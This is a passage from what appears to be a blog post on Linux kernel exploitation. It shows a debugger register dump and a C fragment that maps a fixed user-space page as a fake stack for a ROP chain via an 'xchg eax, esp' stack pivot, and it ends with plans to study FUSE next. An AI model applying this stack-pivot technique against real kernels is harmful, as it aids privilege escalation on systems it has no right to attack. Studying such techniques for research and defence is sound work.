r11            0xff4ea116c0003ff8  -49925426771902472
r12            0x2                 2
r13            0xff19fc968761f220  -64742996173524448
r14            0xff19fc9681c02900  -64742996268013312
r15            0xff19fc968761f200  -64742996173524480
rip            0xffffffff88e41107  0xffffffff88e41107
eflags         0x82                [ IOPL=0 SF ]

There the pivot_target in user space is set to:

	// mmap page for rop chain
	unsigned long pivot_target = xchg_eax_esp & 0xffffffff;
	unsigned long *fake_stack = mmap(pivot_target & 0xfffff000, 0x50000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_POPULATE, 0, 0);

Do let me know if you understand the above better.

What’s next?

I will probably be having a look at FUSE (Filesystem in Userspace) next or why their exploit worked over, but it might take some time to do that and make a blog over it, so stay tuned I guess.